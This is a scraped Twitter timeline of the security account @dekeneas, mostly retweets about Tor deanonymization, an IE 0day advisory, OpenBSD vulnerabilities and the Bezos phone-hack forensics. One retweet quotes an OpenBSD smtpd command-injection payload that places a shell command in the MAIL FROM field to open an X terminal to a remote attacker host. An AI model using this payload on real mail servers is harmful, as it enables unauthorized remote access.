Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @dekeneas
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @dekeneas
-
Dekeneas proslijedio/la je Tweet
Deanonymizing Tor Circuits - The Hacker Factor Blog https://www.hackerfactor.com/blog/index.php?/archives/868-Deanonymizing-Tor-Circuits.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
DMA attacks are often misunderstood as requiring physical access to a device. However, in many cases they can be done remotely, like in this example of exploiting firmware on Nerwork Cardshttps://twitter.com/evil_x_/status/1222972323831209987 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
New Internet Explorer 0day and advisory out. Exploited in wild. No patch from Microsoft. Mitigation is to not use IE. CVE-2020-0674 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
OpenBSD sEcUrE bY DeFaUlT exploit: MAIL FROM:<;xterm --display yourip:0;>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
Perhaps Tech giants should apply the "spouse" test to data collection: "If my spouse told me they want to collect this data on me to be a better partner, would I view this as excessive or creepy?" We tolerate stuff there that we'd never tolerate from our most trusted persons.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
We will reserve a talk slot for most promising new speaker, age 25 and under, picked by our selection committee, fly them out to talk. For the top four submitters, including the winner, we'll give complentary seats at a Dojo of their choice (lim 1/course, rank choice) 2/4
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Dekeneas proslijedio/la je Tweet
Any advisory that contains the line “to overcome this limitation we drew inspiration from the Morris worm” in 2020 is pure gold. Team Qualys continues their retro onslaught vs OpenBSD. https://www.openwall.com/lists/oss-security/2020/01/28/3 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
My comments about the hubbub of AV vuln use finally being caught: Everybody with any experience knew it's going on. AV software was vuln-dev training material more than a decade ago. There were just sufficient economic reasons to ignore it until it became indisputable.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
I miss escaping sandboxes... I've just been grinding out these dumb LPEs because it's hard to really push yourself when depressed.. and they pay good bounties.. I just really want to feel the rush again of escaping a sandbox. Guess msft has a new browser..
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
The
#BezosHack report by FTI gives an insight on how many script kiddies actually made it in the infosec industry
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
When I first read about the "encrypted downloader" I was like "holy shit, how did they put it there before actual exploitation
" but now it's clear
https://twitter.com/alexstamos/status/1220099475990953984 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
Maybe those brillant Saudi students who spoke at
@OPCDE last year can teach one trick or two to FTI Consulting and the former FBI/WH experts about WhatsApp Forensics.#BezosHackhttps://youtu.be/BvjfW1jkwwQHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
Microsoft have released an open source tool to analyze source code for vulnerabilities in almost any modern language:https://github.com/Microsoft/ApplicationInspector/wiki …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
Arcana is looking for ELF binary experts; adept in reverse engineering and software engineering in C. Linux kernel internal knowledge a huge plus. Email resumes to engineering, http://arcanacs.com
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
That's why I say no disease can wipe out mankind.. Nowadays they're finding cures & vaccines for everythinghttps://twitter.com/nicowaisman/status/1219951114034073601 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
It is time.
#deletefacebookHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
The modern age fortune tellers will use their crystal balls to tell you if your iPhone has been hacked. No seriously the lack of real inspectability of iPhones has created a market for companies that sell reports to clients that convince them they got hacked
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Dekeneas proslijedio/la je Tweet
The Bezos forensic report is not very good. The forensic analysis should be done by
@citizenlab who at least have the relevant experience. The MP4 file should contain the exploit (if it is CVE-2019-11931). The exploit trigger should be visible with ffmpeg https://processors.wiki.ti.com/index.php/Extracting_MPEG-4_Elementary_Stream_from_MP4_Container#Extract_Elementary_Stream_with_FFmpeg …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Working on a new product: Dekeneas for filesystems, aimed at identifying APT & cybercriminal activity using artificial intelligence.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.